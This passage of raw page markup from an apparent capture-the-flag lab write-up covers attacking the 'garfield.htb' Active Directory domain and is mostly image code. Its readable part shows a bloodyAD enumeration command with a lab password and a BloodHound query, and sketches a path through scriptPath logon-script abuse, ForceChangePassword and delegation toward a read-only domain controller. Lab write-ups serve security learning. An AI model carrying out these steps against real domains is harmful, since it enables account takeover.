data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bbf3d1a1-e90d-469f-acc4-66c7c5eb44c9_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:182966,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18496462-3693-49a8-9524-9b3bc166e7b3_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!fNsy!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf3d1a1-e90d-469f-acc4-66c7c5eb44c9_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!fNsy!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf3d1a1-e90d-469f-acc4-66c7c5eb44c9_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!fNsy!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf3d1a1-e90d-469f-acc4-66c7c5eb44c9_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!fNsy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf3d1a1-e90d-469f-acc4-66c7c5eb44c9_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>However our guy have scriptPath attack-path attribute:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -d garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' get writable --detail 

distinguishedName: CN=Guest,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=garfield,DC=htb
url: WRITE
wWWHomePage: WRITE

distinguishedName: CN=krbtgt_8245,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

distinguishedName: CN=Jon Arbuckle,CN=Users,DC=garfield,DC=htb
thumbnailPhoto: WRITE
. . .[SNIP]. . .
postalAddress: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE

distinguishedName: CN=Liz Wilson,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

distinguishedName: CN=Liz Wilson ADM,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE</code></pre></div><p>To Both L.Wilson Users:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!4uZD!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5096b1ff-a812-4970-b2e1-41624e556fd8_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!4uZD!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5096b1ff-a812-4970-b2e1-41624e556fd8_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!4uZD!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5096b1ff-a812-4970-b2e1-41624e556fd8_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!4uZD!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5096b1ff-a812-4970-b2e1-41624e556fd8_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!4uZD!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5096b1ff-a812-4970-b2e1-41624e556fd8_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!4uZD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5096b1ff-a812-4970-b2e1-41624e556fd8_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5096b1ff-a812-4970-b2e1-41624e556fd8_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:193819,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5096b1ff-a812-4970-b2e1-41624e556fd8_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!4uZD!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5096b1ff-a812-4970-b2e1-41624e556fd8_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!4uZD!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5096b1ff-a812-4970-b2e1-41624e556fd8_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!4uZD!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5096b1ff-a812-4970-b2e1-41624e556fd8_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!4uZD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5096b1ff-a812-4970-b2e1-41624e556fd8_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;sql&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-sql">MATCH (u:User) WHERE u.name STARTS WITH 'L.WILSON' RETURN u</code></pre></div><p>So with that scriptPath, it can create us an attack path, impersonate L.Wilson Users:</p><ul><li><p>Tigger the (.bat) files on SMB shares</p></li></ul><p>To whoever L.Wilson users we&#8217;ve got, we can eventually gain the other one due to &#8220;ForceChangePassword&#8220; attack:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!O-TR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F84496812-5254-4c92-bd5f-5731b2cdcf4b_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!O-TR!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F84496812-5254-4c92-bd5f-5731b2cdcf4b_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!O-TR!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F84496812-5254-4c92-bd5f-5731b2cdcf4b_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!O-TR!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F84496812-5254-4c92-bd5f-5731b2cdcf4b_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!O-TR!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F84496812-5254-4c92-bd5f-5731b2cdcf4b_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!O-TR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F84496812-5254-4c92-bd5f-5731b2cdcf4b_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/84496812-5254-4c92-bd5f-5731b2cdcf4b_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:124824,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F867d0339-77f8-40cc-806e-6323e5f8bf9f_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!O-TR!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F84496812-5254-4c92-bd5f-5731b2cdcf4b_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!O-TR!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F84496812-5254-4c92-bd5f-5731b2cdcf4b_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!O-TR!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F84496812-5254-4c92-bd5f-5731b2cdcf4b_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!O-TR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F84496812-5254-4c92-bd5f-5731b2cdcf4b_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We can change the password internally with PowerShell so don&#8217;t worry bout it!!</p><p>After User L.Wilson_ADM (I believe admin) or higher L.Wilson, we discover another domain machine name of RODC01:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!iuFF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06584aca-6f78-456e-af22-2d05ea52baf1_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!iuFF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06584aca-6f78-456e-af22-2d05ea52baf1_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!iuFF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06584aca-6f78-456e-af22-2d05ea52baf1_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!iuFF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06584aca-6f78-456e-af22-2d05ea52baf1_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!iuFF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06584aca-6f78-456e-af22-2d05ea52baf1_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!iuFF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06584aca-6f78-456e-af22-2d05ea52baf1_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/06584aca-6f78-456e-af22-2d05ea52baf1_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:146261,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F92a5c2d1-2a82-4ff0-a366-5348a16fd60e_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!iuFF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06584aca-6f78-456e-af22-2d05ea52baf1_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!iuFF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06584aca-6f78-456e-af22-2d05ea52baf1_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!iuFF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06584aca-6f78-456e-af22-2d05ea52baf1_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!iuFF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06584aca-6f78-456e-af22-2d05ea52baf1_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>L.Wilson_ADM is also listed under TIER1.</p><ul><li><p><a href="https://bloodhound.specterops.io/get-started/security-boundaries/tier-zero-members">TIER by SpecterOps.</a></p></li></ul><p>So potentially we can perform delegations family (maybe RBCD) when we got L.Wilson admin, would be fast.</p><p>The computer account of RDC01 is also have OOB to krbTGT account:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!uzZ-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0f1846f-132b-4383-b473-0da243b1250d_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!uzZ-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0f1846f-132b-4383-b473-0da243b1250d_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!uzZ-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0f1846f-132b-4383-b473-0da243b1250d_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!uzZ-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0f1846f-132b-4383-b473-0da243b1250d_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!uzZ-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0f1846f-132b-4383-b473-0da243b1250d_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!uzZ-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0f1846f-132b-4383-b473-0da243b1250d_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e0f1846f-132b-4383-b473-0da243b1250d_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:187272,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0f1846f-132b-4383-b473-0da243b1250d_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!uzZ-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0f1846f-132b-4383-b473-0da243b1250d_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!uzZ-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0f1846f-132b-4383-b473-0da243b1250d_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!uzZ-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0f1846f-132b-4383-b473-0da243b1250d_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!uzZ-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0f1846f-132b-4383-b473-0da243b1250d_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!p96m!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F493a0a58-a420-4e93-9fc6-3f5dd2a3ebb4_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!p96m!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F493a0a58-a420-4e93-9fc6-3f5dd2a3ebb4_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!p96m!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F493a0a58-a420-4e93-9fc6-3f5dd2a3ebb4_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!p96m!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F493a0a58-a420-4e93-9fc6-3f5dd2a3ebb4_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!p96m!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F493a0a58-a420-4e93-9fc6-3f5dd2a3ebb4_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!p96m!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F493a0a58-a420-4e93-9fc6-3f5dd2a3ebb4_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/493a0a58-a420-4e93-9fc6-3f5dd2a3ebb4_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:127404,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4816eab8-b8b1-4685-9370-bd9bb010102d_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" 